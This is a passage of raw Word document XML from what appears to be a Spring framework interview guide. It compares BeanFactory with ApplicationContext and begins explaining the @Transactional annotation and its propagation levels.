        </w:num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Internationalization</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Supports message resource handling for internationalized messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA09F4" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1855"/>
        </w:num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Annotation-based configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Supports annotations like @Component, @Autowired, @Value, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CECAEBC" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1855"/>
        </w:num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Event Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF814A5" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1855"/>
        </w:num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BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Doesn't support event handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3D008B" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1855"/>
        </w:num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ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Supports event handling through the ApplicationEventPublisher interface, allowing the application to publish events and listen for them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A9F0D" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1855"/>
        </w:num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Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC4854C" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1855"/>
        </w:num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BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Supports dependency injection through XML configuration or programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403A8AB4" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1855"/>
        </w:num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ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Supports dependency injection and additionally works seamlessly with annotation-based configuration (@Autowired, @Component, etc.) and XML configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E7E9EB" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1855"/>
        </w:num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ApplicationContext Aware</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C059DA1" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1855"/>
        </w:num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BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Doesn't support ApplicationContextAware, meaning beans cannot directly access the ApplicationContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7D31B4" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1855"/>
        </w:num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ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Implements ApplicationContextAware so that beans can access the ApplicationContext they belong to and use its functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E8CF49" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1855"/>
        </w:num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Common Use Cases</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3564F7F7" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1855"/>
        </w:num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lastRenderedPageBreak/>
        <w:t>BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Best suited for lightweight scenarios where the application needs a minimal footprint, and lazy initialization is important. It is rarely used in modern Spring applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D898D67" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1855"/>
        </w:num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ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used in most Spring applications, as it offers more features and is more robust for handling complex application configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21029DFC" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C737FDF" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1856"/>
        </w:num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BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the basic and minimal version of the Spring container and is used in specific cases where the application requires a lightweight container with lazy bean initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD781B" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1856"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the more feature-rich, commonly used container that extends BeanFactory and includes additional features like event handling, internationalization, annotation support, and more. For most applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is preferred due to its extensive capabilities and ease of use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBB4C5E" w14:textId="713910EC" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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38CF253">
          <v:rect id="_x0000_i2105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5D6EF6" w14:textId="17F95855" w:rsidR="005A272C" w:rsidRPr="00CE4B95" w:rsidRDefault="005A272C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="436" w:name="_Toc196307916"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @Transactional annotation in spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="436"/>
    </w:p>
    <w:p w14:paraId="28CF3998" w14:textId="10BE519F" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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The @Transactional annotation in Spring is used to manage transaction boundaries in a Spring application. It indicates that a method or class should be executed within the context of a transaction, ensuring that all operations within the method are completed successfully before committing the transaction. If any operation fails, the transaction can be rolled back to maintain data consistency and integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E14713" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Uses of @Transactional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7068FC" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C787784" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Transactional manages the start, commit, and rollback of transactions, ensuring that all database operations within the method are executed as a single unit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648DF957" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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If any exception occurs, the transaction can be rolled back, ensuring the consistency of the data (e.g., rolling back changes to the database in case of an error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A35825" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Declarative Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56795F9A" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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 xml:space="preserve">Spring provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>declarative transaction management</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where you can configure transactions using annotations like @Transactional instead of dealing with the low-level management of transactions (e.g., manually beginning or committing a transaction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095580D3" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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This allows for cleaner and more maintainable code, separating the business logic from the transaction management logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303BC504" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0002044C" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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 xml:space="preserve">Ensures that operations that must be executed together (like saving multiple related entities) either succeed or fail together, preserving the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACID</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Atomicity, Consistency, Isolation, Durability) properties of the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B82EA" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Transaction Propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A4AC2" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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 xml:space="preserve">It supports various </w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transaction propagation levels</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that define how the transaction should behave in case of nested method calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7762F6EC" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REQUIRED</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a transaction already exists, it will be used; otherwise, a new one will be created (default behavior).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7C514" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REQUIRES_NEW</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suspends any existing transaction and creates a new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01406829" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SUPPORTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a transaction exists, it will participate; otherwise, no transaction will be started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE8A2D8" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MANDATORY</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The method must be invoked within an existing transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBC09EA" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NEVER</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The method must not be invoked within a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D54C5C" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NOT_SUPPORTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The method will not run within a transaction, even if one exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDF2842" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rollback Rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
